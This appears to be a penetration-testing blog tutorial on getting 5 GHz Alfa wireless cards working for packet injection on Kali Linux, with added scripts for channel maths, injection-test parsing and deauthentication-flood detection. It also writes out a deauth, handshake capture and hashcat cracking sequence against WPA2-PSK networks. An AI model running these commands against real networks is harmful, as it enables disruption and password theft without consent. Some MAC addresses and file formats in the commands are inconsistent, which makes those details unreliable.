How to get your new 5 GHz wireless penetration gear up and working
What new wireless .ac cards work with the latest rolling Kali release (4.14)?
As of February 6th, you can download or upgrade to the latest rolling release of Kali Linux 2018.1. Here’s a quick rundown of what to do to ensure your gear is working for your next wireless penetration test. Not every wireless card (and only a few routers) can be used for packet injection.
Realtek chipset based wireless USB cards are now commonplace, like the evil looking Alfa AC1200 & AC1900 WiFi adapters currently sold on Amazon. They support 5 GHz as well, but depending on the card version and the Realtek chipset they aren't consistent at this time due to driver issues. Cards like the Ralink/MediaTek RT3572 chipset based cards work out of the box and have solid driver support, but have their issues as well.
AWUS052NH
Performs passive and offensive discovery and attack modes for both the 2.4 and 5 GHz bands.
Works out of the box on Kali 4.14 and supports injection.
root@kali:~# lsusb
Bus 001 Device 002: ID 148f:3572 Ralink Technology, Corp. RT3572 Wireless Adapter
# airmon-ng start wlan0
# history
1 apt-get update && apt-get upgrade
2 apt-get dist-upgrade
root@kali:~# uname -ar
Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux
— After a reboot —
Out of the 3 cards tested so far with the latest Kali rolling release, the only one that works out of the box in the 5 GHz world is the AWUS052NH. With any other card you’re dealing with an unstable, not yet finalized driver. Your mileage will vary depending on your version of Kali. If you like rolling updates, then buyer beware.
Install Wireless Drivers with Kali rolling
AWUS036ACH & AWUS1900
$ apt install realtek-rtl88xxau-dkms
Setting monitor mode manually
You have to set the monitor mode manually on the AWUS036ACH & AWUS1900 cards at this time.
Set interface down
$ sudo ip link set wlan0 down
Set monitor mode
$ sudo iwconfig wlan0 mode monitor
Set interface up
$ sudo ip link set wlan0 up
For switching channels (interface must be up)
Set channel 6, width 40 MHz:
$ sudo iw wlan0 set channel 6 HT40-
Set channel 149, width 80 MHz:
$ sudo iw wlan0 set freq 5745 80 5775
For setting TX power (doesn’t work on every card)
$ sudo iwconfig wlan0 txpower 30
or
$ sudo iw wlan0 set txpower fixed 3000
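The "5745 80 5775" pair in the 80 MHz example above is the control frequency of channel 149 plus the center frequency of the 80 MHz block it sits in, and you need a different pair for every channel. The script below is an added example, not from the original post: it computes those numbers for any 5 GHz primary channel (5000 + 5 × channel for the control frequency; the block's first channel + 6 for the center), reports which half of a 40 MHz pair a channel is (HT40+ or HT40-), and prints the `iw` command rather than running it unless APPLY=1 is set. The file name chan80.sh is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original post): turn a 5 GHz channel number into
# the arguments `iw <iface> set freq <ctrl_freq> 80 <center_freq>` expects, so
# pairs like "5745 80 5775" don't have to be looked up by hand. Prints the
# command by default; set APPLY=1 to actually run it (needs root and iw).

# 5 GHz control frequency in MHz for a channel number: 5000 + 5 * channel.
chan2freq() {
    echo $((5000 + 5 * $1))
}

# First primary channel of the 80 MHz block that contains channel $1.
# Blocks are 16 channel numbers wide and start at 36, 52 / 100, 116, 132 / 149, 165.
block80_start() {
    ch=$1
    if   [ "$ch" -ge 36  ] && [ "$ch" -le 64  ]; then base=36
    elif [ "$ch" -ge 100 ] && [ "$ch" -le 144 ]; then base=100
    elif [ "$ch" -ge 149 ] && [ "$ch" -le 177 ]; then base=149
    else
        echo "channel $ch is not a 5 GHz channel usable at 80 MHz" >&2
        return 1
    fi
    # only the 20 MHz primaries (every 4th channel number) are valid
    if [ $(( (ch - base) % 4 )) -ne 0 ]; then
        echo "channel $ch is not a 20 MHz primary channel" >&2
        return 1
    fi
    echo $(( base + ((ch - base) / 16) * 16 ))
}

# Center frequency of the 80 MHz block: its start channel + 6, i.e. +30 MHz.
center80() {
    start=$(block80_start "$1") || return 1
    echo $(( $(chan2freq "$start") + 30 ))
}

# Whether $1 is the lower (HT40+) or upper (HT40-) half of its 40 MHz pair.
ht40_side() {
    start=$(block80_start "$1") || return 1
    if [ $(( (($1 - start) / 4) % 2 )) -eq 0 ]; then echo "HT40+"; else echo "HT40-"; fi
}

# Build the iw command for an 80 MHz channel: interface $1, channel $2.
iw_freq_cmd80() {
    center=$(center80 "$2") || return 1
    echo "iw $1 set freq $(chan2freq "$2") 80 $center"
}

# Usage: sh chan80.sh wlan0 149   ->   iw wlan0 set freq 5745 80 5775
if [ $# -eq 2 ]; then
    cmd=$(iw_freq_cmd80 "$1" "$2") || exit 1
    echo "$cmd"
    if [ "${APPLY:-0}" = 1 ]; then $cmd; fi
fi
```

Channels that are not 20 MHz primaries (38, 42, ...) or that lie outside the 80 MHz capable ranges are rejected instead of producing a frequency the driver will refuse, which is the usual reason `iw ... set freq` fails with "Invalid argument".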
Troubleshooting
If you run into Linux header issues when installing your new wireless drivers, it may be due to the latest rolling release. My suggestion: look through the available Linux images and install the requirements.
apt-cache search linux-image
Ensure you installed the requirements and/or manually install the drivers.
apt install dkms &&
apt-get install bc &&
apt-get install build-essential &&
apt-get install linux-headers-$(uname -r)
git clone https://github.com/aircrack-ng/rtl8812au
Test
Ensure your card is now working in monitor mode. I like to make sure the card is working with the aircrack-ng suite installed by default before I install the latest Kismet. I usually do this for passive recon before I start testing offensively.
airodump-ng wlan1 --band ag -M -U --wps --beacons -w captureallthewireless
# ifconfig wlan0
#aireplay-ng wlan0 -9
10:09:24 Trying broadcast probe requests..
Install the latest Kismet
Installation instructions taken from Kismet’s git page.
$ sudo apt-get install build-essential git libmicrohttpd-dev \
    zlib1g-dev libnl-3-dev libnl-genl-3-dev libcap-dev \
    libpcap-dev libncurses5-dev libnm-dev libdw-dev \
    libsqlite3-dev
Clone Kismet from git. If you haven't cloned Kismet before:
$ git clone https://www.kismetwireless.net/git/kismet.git
$ cd kismet
If you have cloned Kismet before, update your copy instead:
$ cd kismet
$ git pull
Configure and compile Kismet.
$ ./configure
$ make
Kismet
./kismet wlan0
Point your browser at http://localhost:2501
This is my own Kali box above, shown working with a card in monitor mode and the web interface accessible locally. I really like the new web UI. It’s great for interacting with your data, and with cool tools like the KismetMobileDashboard and upcoming support for more software defined radios like the HackRF, Kismet has some awesome ways to interact with tons of useful AP and client info for WiFi and Bluetooth.
Cool, so we should have a VM running Kali 4.14 with .ac support, and injection support for Part 2. This should give us a nice new working Kali install that’s a reproducible environment to test some newer attacks.
Next time we’ll look at offensive wireless attacks that I’ve used on clients while performing wireless penetration testing for companies. The wireless attacks I’ll describe have been used to breach some of the largest companies, from Fortune 5s to small and medium businesses alike.
802.11ac Wireless Attacks
Part 2:
- Configuration of your device for injection attacks that can be used with .ac wireless access points
- How to perform deauth attacks on 5 GHz channels
- How to capture a 4 way handshake, for a wireless network using WPA2-PSK that’s broadcasting on a 5 GHz channel
- How to convert the handshake to the right format, so we can brute force it with hashcat.
In part 3 we’ll also discuss in detail advanced wireless offensive attacks that not only lure clients to connect, but perform man-in-the-middle attacks and/or network attacks against the unsuspecting victims. Part 3 will take a deep dive into common offensive wireless attacks.
AWUS036ACH after setting the channel:
iwconfig wlan1 channel 149
Let’s test the interface using native tools to rule out any channel, driver or aircrack-ng specific nuances with this version of the Realtek 5 GHz compatible USB device and the latest release of Kali.
Remember we have lots of variables in the mix, so your mileage may vary depending on Operating System type and driver.
root@kali:~# aireplay-ng | more
Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
https://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Let’s test injection:
root@kali:~# aireplay-ng -D --test -e ssid -a P4:E4:E4:92:60:71 wlan1
10:53:10 Trying broadcast probe requests...
10:53:12 No Answer...
10:53:12 Found 1 AP
10:53:12 Trying directed probe requests...
10:53:12 C4:E9:84:9F:60:71 - channel: 0 - 'shameless-karma!'
10:53:18 0/30: 0%
root@kali:~# iwconfig wlan1 channel 149
It performs injection perfectly AFTER hard coding the channel we’re sniffing on:
kali:~# aireplay-ng -D --test -e ssid -a P4:E4:E4:92:60:71 wlan1
10:53:27 Trying broadcast probe requests...
10:53:29 No Answer...
10:53:29 Found 1 AP
10:53:29 Trying directed probe requests...
10:53:29 P4:E4:E4:92:60:71 - channel: 0 - 'shameless-karma!'
10:53:29 Ping (min/avg/max): 0.914ms/2.795ms/5.201ms Power: -37.61
10:53:29 28/30: 93%
10:53:29 Injection is working!
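The two runs above (0/30 before pinning the channel, 28/30 after) are exactly the numbers worth checking before every engagement, and with four or five cards it is easier to script the check than to read it. The block below is an added example and not part of the original post: `parse_injection_test` reads the output of an `aireplay-ng -D --test` / `-9` run from stdin with awk and reports the directed-probe score and verdict, and `injection_ok` turns that into a pass/fail with a minimum percentage. The two sample transcripts are constructed from the runs shown above; the file name and threshold are mine.

```shell
#!/bin/sh
# Added example (not from the original post): parse `aireplay-ng -D --test`
# output so a pre-engagement check of several cards can be scripted instead
# of eyeballed. Sample transcripts below are constructed from the post's runs.

# Print "<hits> <total> <percent> <verdict>" for one aireplay-ng test run read
# from stdin. verdict is "working" when the tool says so, otherwise "failed".
parse_injection_test() {
    awk '
        # lines like "10:53:29 28/30: 93%" carry the directed-probe score
        match($0, "[0-9]+/[0-9]+: [0-9]+%") {
            s = substr($0, RSTART, RLENGTH)
            split(s, a, "[/:% ]+")
            hits = a[1]; total = a[2]; pct = a[3]
        }
        /Injection is working!/ { ok = 1 }
        END {
            if (hits == "") { hits = 0; total = 0; pct = 0 }
            printf "%d %d %d %s\n", hits, total, pct, (ok ? "working" : "failed")
        }'
}

# Succeed only if the card injects AND at least $1 percent (default 90) of the
# directed probes were answered; a card that scrapes by on 20% is not one to
# rely on in the field.
injection_ok() {
    min=${1:-90}
    set -- $(parse_injection_test)
    if [ "$4" = working ] && [ "$3" -ge "$min" ]; then return 0; else return 1; fi
}

# Constructed sample: the second run from the post, channel pinned to 149.
SAMPLE_OK="10:53:27 Trying broadcast probe requests...
10:53:29 No Answer...
10:53:29 Found 1 AP
10:53:29 Trying directed probe requests...
10:53:29 P4:E4:E4:92:60:71 - channel: 0 - 'shameless-karma!'
10:53:29 Ping (min/avg/max): 0.914ms/2.795ms/5.201ms Power: -37.61
10:53:29 28/30: 93%
10:53:29 Injection is working!"

# Constructed sample: the first run, before the channel was pinned.
SAMPLE_FAIL="10:53:10 Trying broadcast probe requests...
10:53:12 No Answer...
10:53:12 Found 1 AP
10:53:12 Trying directed probe requests...
10:53:18 0/30: 0%"

# Live usage (interface and target names are placeholders):
#   aireplay-ng -D --test -e <ssid> -a <bssid> wlan1 | injection_ok 90 && echo PASS
```

Running the two samples through `parse_injection_test` gives "28 30 93 working" and "0 30 0 failed"; the failed one is the symptom described above, where the card is on the wrong channel and never hears the AP.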
Let’s try the Fake authentication de-authentication method on 5 GHz:
aireplay-ng -D --fakeauth 6000 -o 1 -q 10 -a 20:AA:XX:XX:XX:XX \
-h E0:F8:XX:XX:XX:XX -e MYISPSUCKS-5G wlan0mon
Where:
- 6000 — Re-authenticate every 6000 seconds. The long period also causes keep alive packets to be sent.
- -o 1 — Send only one set of packets at a time. Default is multiple and this confuses some APs.
- -q 10 — Send keep alive packets every 10 seconds.
- -h E0:F8:XX:XX:XX:XX is our card’s MAC address
- -e MYISPSUCKS-5G is the wireless network name
Let’s tie it all together: send some deauth packets to a client and grab a 5 GHz 4 way handshake from an access point using WPA2-PSK.
# put your network device into monitor mode
Set interface down
$ sudo ip link set wlan0 down
Set monitor mode
# iwconfig wlan0 mode monitor
Set interface up
# ip link set wlan0 up
# listen for all nearby beacon frames to get target BSSID and
# airodump-ng wlan0 --band abg
Set 5 GHz channel
# iwconfig wlan0 channel 149
Start listening for the handshake
# airodump-ng -c 149 --bssid P4:E4:E4:92:60:71 -w cap01.cap wlan0
Optionally deauth a connected client to force a handshake
# aireplay-ng -D -0 2 -a 9C:5C:8E:C9:AB:C0 -c P4:E4:E4:92:60:71 wlan0
Convert cap to hccapx (aircrack-ng takes the output prefix first, then the capture; this writes capture.hccap)
# aircrack-ng -J capture file.cap
Crack with hashcat:
> hashcat.exe -m 2500 capture.hccapx rockyou.txt
For any issues when converting .cap captures, try wpaclean or the Cap-Converter:
git clone https://github.com/wpatoolkit/Cap-Converter
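The deauth step above only works because deauthentication and disassociation frames are unauthenticated unless the network runs Protected Management Frames (802.11w), which is the mitigation; on networks without it, the defender's remaining option is to notice the burst on the air. The block below is an added example, not part of the original post: `detect_deauth_flood` reads tshark field output (epoch time, frame type/subtype, source, destination, tab separated) and raises an alert for any source that sends more than MAX deauth/disassoc frames inside a sliding window of WINDOW seconds. The tshark command in the comment is my assumed way of producing that input and the sample frames are constructed with `make_sample`; the two-frame `-0 2` burst from the post would sit well under the default threshold, which is deliberate, since a single client leaving normally also sends one.

```shell
#!/bin/sh
# Added example (not from the original post): flag deauthentication floods on a
# monitored 5 GHz channel. Input is one frame per line, tab separated:
#   <frame.time_epoch> <wlan.fc.type_subtype> <wlan.sa> <wlan.da>
# Assumed capture command (monitor-mode interface is a placeholder):
#   tshark -i wlan0mon -I -l -T fields -E separator=/t \
#     -e frame.time_epoch -e wlan.fc.type_subtype -e wlan.sa -e wlan.da \
#     -Y 'wlan.fc.type_subtype == 0x000c || wlan.fc.type_subtype == 0x000a' \
#   | detect_deauth_flood 5 10

# $1 = window in seconds (default 5), $2 = max frames per window (default 10).
detect_deauth_flood() {
    window=${1:-5}; max=${2:-10}
    awk -F'\t' -v W="$window" -v MAX="$max" '
        # 0x000c = deauthentication, 0x000a = disassociation; both are unprotected
        # without 802.11w. Older tshark prints the subtype in decimal (12 / 10).
        $2 == "0x000c" || $2 == "0x000a" || $2 == "12" || $2 == "10" {
            src = $3
            n[src]++; t[src, n[src]] = $1
            # slide the window: drop timestamps older than W seconds
            while (head[src] < n[src] && t[src, head[src] + 1] < $1 - W) head[src]++
            cnt = n[src] - head[src]
            if (cnt > MAX && !flagged[src]) {
                flagged[src] = 1
                printf "ALERT %s sent %d deauth/disassoc frames in %ds (last target %s)\n", src, cnt, W, $4
            }
        }'
}

# Constructed sample: one legitimate disassociation from a client, then 12
# broadcast deauths "from" the AP address, $1 milliseconds apart (default 100).
make_sample() {
    step=${1:-100}
    printf '%s\t%s\t%s\t%s\n' 1518000000.000 0x000a 11:22:33:44:55:66 aa:bb:cc:dd:ee:01
    i=0
    while [ $i -lt 12 ]; do
        ms=$((i * step))
        printf '%d.%03d\t%s\t%s\t%s\n' $((1518000001 + ms / 1000)) $((ms % 1000)) \
            0x000c aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff
        i=$((i + 1))
    done
}

# Demo: 12 deauths in 1.2 s trips the default threshold; the same 12 spread
# one second apart never has more than 6 inside a 5 s window and stays quiet.
if [ "${DEMO:-0}" = 1 ]; then
    make_sample 100  | detect_deauth_flood 5 10
    make_sample 1000 | detect_deauth_flood 5 10
fi
```

The alert fires once per source, on the frame that pushes the window over the threshold, so a log line reads "ALERT aa:bb:cc:dd:ee:01 sent 11 deauth/disassoc frames in 5s (last target ff:ff:ff:ff:ff:ff)" for the fast burst. Since the spoofed source is the AP's own address, the only reliable tell is the rate, which is why the window is per source rather than per target.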
5 GHz Injection Tests
The cards tested below support injection with little to no manual driver configuration on the latest Kali rolling release.
This is meant to supplement the aircrack-db test database for the newer Alfa cards I’ve had a chance to test for injection in the 802.11ac spectrum.
apt install realtek-rtl88xxau-dkms
Working cards
- Alfa AC1200
- Alfa AWUS052NH
- Alfa AWUS036NH
- Alfa AWUS036ACH
1st set of Contenders
Score 100%
- Alfa AC1200
- Alfa AWUS1900
root@kali:~# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 8814au Realtek Semiconductor Corp.
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572
phy3 wlan2 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy5 wlan3 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy4 wlan4 rt2800usb Ralink Technology, Corp. RT2770
root@kali:~# iwconfig wlan2 channel 149
root@kali:~# iwconfig wlan3 channel 56
root@kali:~# aireplay-ng -D -9 -i wlan2 wlan3
14:55:33 Trying broadcast probe requests...
14:55:34 No Answer...
14:55:34 Found 1 AP
14:55:34 Trying directed probe requests...
14:55:34 P4:29:88:9F:60:71 - channel: 149 - 'ssid'
14:55:35 Ping (min/avg/max): 0.735ms/3.759ms/9.462ms Power: -37.77
14:55:35 30/30: 100%
14:55:35 Injection is working!
14:55:35 Trying card-to-card injection...
14:55:35 Attack -0: OK
14:55:35 Attack -1 (open): OK
14:55:35 Attack -1 (psk): OK
14:55:35 Attack -2/-3/-4/-6: OK
14:55:35 Attack -5/-7: OK
root@kali:~# iwconfig
wlan2 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
wlan1 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
wlan4 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
wlan0 IEEE 802.11 Mode:Monitor Frequency:2.452 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
wlan3 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
eth0 no wireless extensions.
2nd set of Contenders
Score 90%
- Alfa AWUS052NH
- Alfa AWUS036NH
root@kali:~# iwconfig wlan1 channel 36
root@kali:~# iwconfig wlan4 channel 149
root@kali:~# aireplay-ng -D -9 -i wlan1 wlan4
root@kali:~# iwconfig wlan4 channel 149
root@kali:~# aireplay-ng -D -9 -i wlan1 wlan4
15:10:11 Trying broadcast probe requests...
15:10:13 No Answer...
15:10:13 Found 1 AP
15:10:13 Trying directed probe requests...
15:10:13 BF:E9:54:9F:T0:71 - channel: 149 - 'shameonyou'
15:10:13 Ping (min/avg/max): 0.330ms/6.444ms/12.453ms Power: -26.00
15:10:13 30/30: 100%
15:10:13 Injection is working!
15:10:13 Trying card-to-card injection...
15:10:13 Attack -0: OK
15:10:13 Attack -1 (open): OK
15:10:13 Attack -1 (psk): OK
15:10:13 Attack -2/-3/-4/-6: OK
15:10:17 Attack -5/-7: Failed
root@kali:~# iwconfig
wlan2 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
wlan1 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
wlan4 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
wlan0 IEEE 802.11 Mode:Monitor Frequency:2.452 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
wlan3 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
eth0 no wireless extensions.
root@kali:~# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 8814au Realtek Semiconductor Corp.
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572
phy3 wlan2 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy5 wlan3 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy4 wlan4 rt2800usb Ralink Technology, Corp. RT2770
3rd set of Contenders
Score 50%
- Alfa AWUS036ACH — 100%
- Alfa AWUS1900 — 50%
root@kali:~# aireplay-ng -D -9 wlan0 wlan1
"aireplay-ng --help" for help.
root@kali:~# aireplay-ng -D -9 wlan1
15:20:11 Trying broadcast probe requests...
15:20:13 No Answer...
15:20:13 Found 0 APs
root@kali:~# iwconfig wlan1 channel 149
root@kali:~# aireplay-ng -D -9 wlan1
15:20:21 Trying broadcast probe requests...
15:20:21 Injection is working!
15:20:23 Found 1 AP
15:20:23 Trying directed probe requests...
15:20:23 V4:E9:F4:9F:Z0:71 - channel: 149 - 'yourssidrules'
15:20:23 Ping (min/avg/max): 0.901ms/10.325ms/14.429ms Power: -26.00
15:20:23 30/30: 100%
root@kali:~# aireplay-ng -D -9 wlan0
15:20:47 Trying broadcast probe requests...
15:20:49 No Answer...
15:20:49 Found 0 APs
root@kali:~# airmon-ng
PHY Interface Driver Chipset
phy6 wlan0 8814au Realtek Semiconductor Corp. - partially working
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572 - working